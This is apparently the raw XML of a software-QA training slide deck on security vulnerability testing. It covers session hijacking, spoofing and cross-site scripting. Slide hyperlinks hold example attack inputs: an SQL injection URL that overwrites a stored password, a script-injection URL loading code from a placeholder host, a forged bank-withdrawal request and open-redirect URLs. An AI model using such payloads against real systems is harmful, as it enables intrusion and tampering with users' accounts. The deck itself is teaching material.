            <a:off x="152400" y="228602"/>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537495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iming>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="r" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">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1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3000" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Corbel" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="r" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3000" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Corbel" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="r" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3000" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Corbel" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="r" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3000" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Corbel" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="r" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3000" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Corbel" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="r" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3000" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Corbel" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="r" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3000" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Corbel" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="r" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3000" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Corbel" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="319088" indent="-319088" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">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hyperlink" Target="http://academy.telerik.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1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10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www.youtube.com/watch?v=P_u3g95bzIE"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11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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto4.wdp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto5.wdp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11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hyperlink" Target="http://www.magstudio.bg/bg/"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15.gif"/><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hyperlink" Target="https://www.cryptohaze.com/gpurainbowcracker.php" TargetMode="Externa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19.gif"/><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msdn2.microsoft.com/en-us/library/ms978516.aspx"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hyperlink" Target="http://www.sans.org/"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www.acunetix.com/"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2.xml"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto3.wdp"/></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www.wireshark.org/"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7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www.thc.org/"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github.com/maaaaz/thc-hydra-windows"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www.vulnerable.com/redirect.asp?=http:/www.facked.com/advisory/system_failure/password_recovery_system" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.vulnerable.com/redirect.asp?=http://www.links.com"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www.site.com/profile?userid=2249"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www.site.com/profile?userid=224" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide8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hyperlink" Target="https://www.google.com/webmasters/tools/removals-request?hl=en&amp;siteUrl=http://%7bYOUR_URL%7d/&amp;urlt=%7bURL_TO_BLOCK%7d"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www.jamesbreckenridge.co.uk/remove-any-site-from-google-even-if-you-dont-control-it.html"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target/login.asp?userid=bob';%20update%20logintable%20set%20passwd='0n3d';--%00" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://target/getdata.php?data=%3cscript%20src=%22http://www.badplace.com/nasty.js%22%3e%3c/script%3e"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hyperlink" Target="http://bank.example.com/withdraw?account=bob&amp;amount=1000000&amp;for=mallory"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Security Vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Software Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1029" name="Picture 5"/>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228438" y="5288210"/>
            <a:ext cx="1357312" cy="943558"/>
          </a:xfrm>
          <a:prstGeom prst="round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12135" y="2286000"/>
            <a:ext cx="2133600" cy="1640522"/>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 Placeholder 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="497391" y="5455189"/>
            <a:ext cx="3990513" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="319088" indent="-319088" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent5">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="20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t>Telerik Software Academy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Placeholder 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="497392" y="5759989"/>
            <a:ext cx="3990513" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="319088" indent="-319088" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent5">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>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hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://academy.telerik.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text Placeholder 14"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="497392" y="5080546"/>
            <a:ext cx="3990513" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent5">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="2400" b="1" kern="1200" dirty="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a:t>Software Quality Assurance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15476405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Intended </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>vs. Implemented</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a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Intended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>vs. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>implemented</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> software behavior </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>applications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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="C:\Users\ogeorgiev\Desktop\Intended vs Coded.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211636" y="1981200"/>
            <a:ext cx="4720728" cy="4608513"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5644"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:glow rad="1016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089864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Session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hijacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is session hijacking?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Getting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>access to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>session state of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>particular user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Steals </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a valid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ID which is used to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>into system and retrieve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the data</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100</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10242"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19400" y="4267200"/>
            <a:ext cx="3148966" cy="2057400"/>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652738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Spoofing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>vs. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hijacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>not actively </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>take another </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>offline </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>perform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>He mainly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>pretends to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>be another </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>user or machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>gain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>access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101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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82171" y="4209748"/>
            <a:ext cx="1524000" cy="1524000"/>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477000" y="3659490"/>
            <a:ext cx="2057400" cy="1520220"/>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909887" y="5036457"/>
            <a:ext cx="1343025" cy="1587211"/>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Arrow Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4419600" y="4419600"/>
            <a:ext cx="1828800" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1">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686300" y="5379805"/>
            <a:ext cx="2819400" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> am John and here are my credentials</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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293257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Spoofing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>vs. Hijacking (2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attacker takes over an existing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>relies on the legitimate user to make a connection and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>authenticate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102</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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82171" y="3810000"/>
            <a:ext cx="1524000" cy="1524000"/>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400800" y="3684890"/>
            <a:ext cx="2057400" cy="1520220"/>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907629" y="5036457"/>
            <a:ext cx="1343025" cy="1587211"/>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Arrow Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="4419600"/>
            <a:ext cx="3810000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1">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743200" y="3635514"/>
            <a:ext cx="3338513" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>John logs on to the server with his credentials</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4343400" y="4572000"/>
            <a:ext cx="17800" cy="607710"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1">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086281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Spoofing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>vs. Hijacking (3)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Subsequently, the attacker takes over the session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103</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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33400" y="3810000"/>
            <a:ext cx="1524000" cy="1524000"/>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553200" y="3813780"/>
            <a:ext cx="2057400" cy="1520220"/>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429000" y="3886200"/>
            <a:ext cx="1343025" cy="1587211"/>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Arrow Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="4668919"/>
            <a:ext cx="1277542" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1">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151458" y="4689638"/>
            <a:ext cx="1048942" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1">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9" name="Multiply 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2294929" y="4281714"/>
            <a:ext cx="762000" cy="8382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381229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 Hijacking Methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session fixation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Setting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a user's session id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to a predefined one</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session sidejacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>packet sniffing to read network traffic between two parties </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>steal the session cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-site scripting	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Obtain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a copy of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cookie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104</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="322977876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Active vs. Passive Hijacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
